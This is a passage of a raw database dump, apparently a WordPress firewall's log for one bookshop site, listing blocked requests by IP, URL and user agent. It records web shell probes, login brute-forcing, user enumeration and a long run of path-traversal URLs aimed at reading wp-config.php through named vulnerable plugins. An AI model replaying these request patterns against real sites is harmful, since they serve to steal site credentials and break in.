Safari\\/537.36\"}','w7b1hBngE9s8ekzVUXrPxAdc',0,1636500137.8021,119,'','GET',403,0,700,0,1,'',0),('157.245.174.114',2650123890,'','https://ashbooks.co.uk/mini.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','gSaKJv34bDkVLXxjCYs7EBdu',0,1636500138.2289,392,'','GET',403,0,700,0,1,'',0),('157.245.174.114',2650123890,'','https://ashbooks.co.uk/a.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','dDNYhjOTsqZpKyWzRntlaiBf',0,1636500138.9201,163,'','GET',403,0,700,0,1,'',0),('157.245.174.114',2650123890,'','https://ashbooks.co.uk/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','J1WiNruIURMXb9ZlYxqmPAp3',0,1636500139.4131,389,'','GET',403,0,700,0,1,'',0),('157.245.174.114',2650123890,'','https://ashbooks.co.uk/wp-content/plugins/dzs-zoomsounds/wp_mnax.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Xj6dgthYiEZoLNeQ47vwUACm',0,1636500140.1090,388,'','GET',403,0,700,0,1,'',0),('157.245.174.114',2650123890,'','https://ashbooks.co.uk/leafmailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','8tmjR1pc2OHxdN5CZhb4noge',0,1636500141.1278,387,'','GET',403,0,700,0,1,'',0),('157.245.174.114',2650123890,'','https://ashbooks.co.uk/le.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','YdXxsanzPWSCFZhQH2kego0G',0,1636500141.8254,129,'','GET',403,0,700,0,1,'',0),('157.245.174.114',2650123890,'','https://ashbooks.co.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','3LdW5J9hAn1IOqeiPYElNkjQ',0,1636500142.2606,383,'','GET',403,0,700,0,1,'',0),('157.245.174.114',2650123890,'','https://ashbooks.co.uk/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','G6j4kizgw0ONncPXALvlIp9b',0,1636500142.9431,535,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','glmbyvpI9ZDhQUW68R75Oe40',0,1636502175.9926,1890,'','GET',403,0,520,0,1,'',0),('23.228.109.147',400846227,'','https://ashbooks.co.uk/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php','','{\"1\":\"ALittle Client\"}','02lonKGxfkVdZIp3tJBEhTqQ',0,1636502656.1413,413,'','GET',403,0,700,0,1,'',0),('176.107.128.162',2959835298,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','3vU7rF8GT2AKsnd96xwiycaW',0,1636507949.0640,506,'','GET',403,0,520,0,1,'',0),('54.193.101.186',918644154,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\"}','oVAEvezbR3gfHwChW8QxKymX',0,1636508169.7097,1306,'','GET',403,0,520,0,1,'',0),('54.193.101.186',918644154,'','https://ashbooks.co.uk//wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\\/\\/wp-login.php\"}','Sbht2s3YIXw4AcBLFRO8UeGk',0,1636508173.2460,1100,'','POST',403,0,600,0,1,'',0),('5.188.62.76',96222796,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2225.0 Safari\\/537.36\"}','aslbMm0wD1kXeOCRWQIZpAjx',0,1636509454.4597,1553,'','POST',403,0,600,0,1,'',0),('67.205.3.168',1137509288,'','https://ashbooks.co.uk/wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/\\/\\/wp-json\\/wp\\/v2\\/users\\/\"}','IViOXjCNPS4H03LlAWKFTRGa',0,1636519830.9730,198,'','GET',403,0,520,0,1,'',0),('5.188.62.76',96222796,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2227.1 Safari\\/537.36\"}','a50MPRodLjsiUnQCNTFf3J9u',0,1636520061.7037,1451,'','POST',403,0,600,0,1,'',0),('5.188.62.76',96222796,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2224.3 Safari\\/537.36\"}','UCwqibEJMLQHosK2dcGXBvVu',0,1636530607.6605,659,'','POST',403,0,600,0,1,'',0),('200.58.109.114',3359272306,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','zJRdEnUZLQFbpNxqvO3Meu6y',0,1636534102.0600,394,'','POST',403,0,600,0,1,'',0),('143.110.254.148',2406416020,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','hVtKLNwQZvrWcemYplaUFTfR',0,1636534710.4611,434,'','POST',403,0,600,0,1,'',0),('103.129.178.69',1736553029,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','4I2MVNuDSbQGmJFhERnoK1Wv',0,1636535432.6694,505,'','POST',403,0,600,0,1,'',0),('43.129.212.158',729928862,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','8NIE0k5vyFDtAlL9TKqOwhWf',0,1636536097.7625,504,'','POST',403,0,600,0,1,'',0),('152.136.15.140',2559053708,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','VsQ0K179oady5DeifIz8lEph',0,1636536777.8174,419,'','POST',403,0,600,0,1,'',0),('138.219.231.69',2329667397,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','fkPR0Zo5LUla2TBCrNDwWnYG',0,1636537475.6404,558,'','POST',403,0,600,0,1,'',0),('62.171.185.46',1051441454,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','kvRes5YIwbQ9ZUP6gd2nmHN3',0,1636538187.8096,665,'','POST',403,0,600,0,1,'',0),('103.70.29.133',1732648325,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','KvyZEBlr2DzJGSuVP9OwkFcs',0,1636538839.7455,490,'','POST',403,0,600,0,1,'',0),('178.254.50.20',3003003412,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','iRtxrAsEpSUuPqbym9vlZC5M',0,1636539510.1964,422,'','POST',403,0,600,0,1,'',0),('212.192.241.137',3569414537,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.106 Safari\\/537.36\"}','gsHGOCXxjqKoDkviRtrTlFIW',0,1636539960.0534,423,'','GET',403,0,520,0,1,'',0),('185.165.118.46',3114628654,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','rVLdjScgC7OZ3fpWyxkiaFG2',0,1636540210.0598,427,'','POST',403,0,600,0,1,'',0),('101.133.153.105',1703254377,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','xLBeZoGcCH7irUj3gbSfdJt9',0,1636540881.1947,186,'','POST',403,0,600,0,1,'',0),('5.188.62.76',96222796,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2225.0 Safari\\/537.36\"}','yYpw4mxlrouDQg815GtL7RAj',0,1636541228.7302,826,'','POST',403,0,600,0,1,'',0),('43.129.212.158',729928862,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','dWlHBJeM6mRw4ynLFuTaoh8t',0,1636541563.6198,418,'','POST',403,0,600,0,1,'',0),('40.122.130.155',679117467,'','https://ashbooks.co.uk/wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/\\/\\/wp-json\\/wp\\/v2\\/users\\/\"}','eGjcY1RO86TErvyq9QaXfAMU',0,1636542093.1456,427,'','GET',403,0,520,0,1,'',0),('109.234.161.67',1844093251,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','XwCDLZ6bz08oWORnJtPmI2E5',0,1636542262.0053,1191,'','POST',403,0,600,0,1,'',0),('162.240.13.151',2733641111,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','ZflsI8jtcSHXKP90GU2FpEnL',0,1636542954.4338,690,'','POST',403,0,600,0,1,'',0),('162.0.208.15',2717962255,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','j8J4COGz1inZWKlyM7fS5mkx',0,1636543661.6760,650,'','POST',403,0,600,0,1,'',0),('161.97.90.217',2707512025,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','OTNLgCQr6XSaJnDiel8dbU1G',0,1636544373.8666,165,'','POST',403,0,600,0,1,'',0),('103.93.16.69',1734152261,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','9JUpwDikSygzxjGHO6dhq7a4',0,1636545093.5591,433,'','POST',403,0,600,0,1,'',0),('213.149.103.132',3583338372,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','2cZeni9mwtvObQSXrpKxLu3W',0,1636545804.9415,552,'','POST',403,0,600,0,1,'',0),('184.171.244.231',3098277095,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','h3ZfDUXcJbvTVziaC72eol6g',0,1636546525.5589,420,'','POST',403,0,600,0,1,'',0),('111.231.82.232',1877431016,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','5KXvL2aSlepAPI69xJcEiwy1',0,1636547277.5538,453,'','POST',403,0,600,0,1,'',0),('62.210.113.228',1053979108,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','xlygVF9JEGRwkIncaYjeKomM',0,1636547967.4155,3712,'','POST',403,0,600,0,1,'',0),('162.214.114.242',2731963122,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','nwyMO9LJTsGKFkdDcV627IPH',0,1636548693.0166,420,'','POST',403,0,600,0,1,'',0),('63.143.41.18',1066346770,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','Po2l7JkVju1vUqzKMSIZ5gmi',0,1636549536.9259,240,'','POST',403,0,600,0,1,'',0),('139.224.198.47',2346763823,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','dGHL8vNnQzbMj3iKu5XWtwk4',0,1636550240.5000,460,'','POST',403,0,600,0,1,'',0),('5.189.138.128',96307840,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','gWeV9qPMzYxSvubnGUTy8p5C',0,1636551057.0282,430,'','POST',403,0,600,0,1,'',0),('72.167.42.45',1218914861,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','UxHzlSsJbaDRKM0CTQ6P9A7g',0,1636551785.1657,461,'','POST',403,0,600,0,1,'',0),('5.188.62.76',96222796,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2224.3 Safari\\/537.36\"}','dW62oFgnpvR5Ib3QzkumSEiL',0,1636551813.6567,445,'','POST',403,0,600,0,1,'',0),('34.147.103.188',580085692,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','EXw4hyfec3BJn1aCtSvpVYjM',0,1636552569.7953,174,'','POST',403,0,600,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','QCox8tIGShALj4UBY37vsbKq',0,1636552655.4144,1964,'','GET',403,0,520,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk//wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\\/\\/wp-login.php\"}','qpgKR5F30r2QNS1IUjJl6v8x',0,1636552659.1050,2316,'','POST',403,0,600,0,1,'',0),('61.12.67.132',1024213892,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','eauOLKnWQBGwiPkRXsY1ylzJ',0,1636553296.2295,1302,'','POST',403,0,600,0,1,'',0),('75.119.144.140',1266126988,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','lydr3Qe2sEBtWnTfuc8VUx0O',0,1636554088.0499,717,'','POST',403,0,600,0,1,'',0),('64.20.39.18',1075062546,'','https://ashbooks.co.uk/wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/\\/\\/wp-json\\/wp\\/v2\\/users\\/\"}','iqVMjQ3d7UrKuZJcF02kntEx',0,1636554567.7808,1104,'','GET',403,0,520,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','ZxMQ1hvPfnsJAWC40yiGUHgu',0,1636554816.0015,949,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp-admin/vuln.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','Z6kYBlomJXaUxFeqDM4vPE81',0,1636554844.7221,739,'','GET',403,0,700,0,1,'',0),('35.236.172.75',602713163,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','AyTzao58wxsE93UvD2bGhHCj',0,1636554844.6637,846,'','POST',403,0,600,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp-content/force-download.php?file=../wp-config.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','k7iQsXUy3ClEcPLqIb0NHA24',0,1636554929.8776,416,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/force-download.php?file=wp-config.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','PzGULgdnpZYucKsvIJWo76b3',0,1636554930.1512,1225,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','oG6Rjm3D2Zzta4WMOvB05NHi',0,1636554930.9361,752,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp-login.php?redirect_to=https%3A%2F%2Fashbooks.co.uk%2Fwp-admin%2Fadmin.php%3Fpage%3Dmulti_metabox_listing%26action%3Dedit%26id%3D..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php&reauth=1','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','QlfMqNaeXZAYPx8m74LzCUEd',0,1636554931.8345,193,'','GET',404,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','cpEM8z1V7dSeLuNl6PFHK43o',0,1636554932.2498,563,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp-content/plugins/google-document-embedder/libs/pdf.php?fn=lol.pdf&file=../../../../wp-config.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','Eg0G7YlXpi3mUuWZok6RfdFz',0,1636554932.2202,597,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=../../wp-config.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','GiXTOIevEuys2xz6dqcfVbRa',0,1636554932.6323,275,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp-login.php?redirect_to=https%3A%2F%2Fashbooks.co.uk%2Fwp-admin%2Fadmin.php%3Fpage%3Dmiwoftp%26option%3Dcom_miwoftp%26action%3Ddownload%26dir%3D%2F%26item%3Dwp-config.php%26order%3Dname%26srt%3Dyes&reauth=1','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','zA4biLKlf5uetnXhN3RFk8Q2',0,1636554932.2097,708,'','GET',404,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=../../../../wp-config.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','JUigSfDudxesH05Y178mZIFj',0,1636554933.3898,191,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp-content/plugins/recent-backups/download-file.php?file_link=../../../wp-config.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','5u4xsne3i1qUXzObQkCaTDJ6',0,1636554933.6979,231,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=../../../wp-config.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','t0S7LEVHdGIuKYjxWAka3s45',0,1636554934.2152,892,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','1AlPFDQXdjbYLgz4Tf9cp60r',0,1636554935.1097,565,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp-content/plugins/tera-charts/charts/treemap.php?fn=../../../../wp-config.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','EPGm6ChXFLdRgBueMS87rQJV',0,1636554936.1828,443,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','Ieh3wz4NHJ0q8W6mAsCLTvOb',0,1636554936.7795,290,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','kc8ep2sjCl5VbrZ9dwFnoST4',0,1636554937.4813,753,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','kmTlA9K3S4uOIqVyjnCfM7QY',0,1636554937.2311,1047,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp-content/plugins/ungallery/source_vuln.php?pic=../../../../../wp-config.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','NIlpt85dJqB04xKQakoXfve9',0,1636554939.3509,322,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=../../../../../wp-config.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','Gjp6T2EeqZIdnDuUk8B9bvKh',0,1636554939.1717,610,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','oGYmaV6uxpWXtDk7ZSRiBw8q',0,1636554940.0262,1201,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','bhq5GkZmjpi0A1LTxC28346a',0,1636554940.5182,739,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp-content/plugins/mac-dock-gallery/macdownload.php?albid=../../../wp-config.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','U62Bzc5bus8WkMETPpdaVROt',0,1636554943.3068,450,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/adminer.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','70NInA1eZp8OlDXKwrP2FhbL',0,1636554958.2252,501,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp-admin/mysql-adminer.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','KkwafgV38yMhT76ujOczoGCd',0,1636554958.5619,414,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp-admin/adminer.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','YPqUZT6RHt8mDIQfAzXdu1x7',0,1636554958.8013,210,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/adminer/adminer.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','Amb95cK6pR7jakHZNgCMVi0U',0,1636554959.4834,514,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/mysql-adminer.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 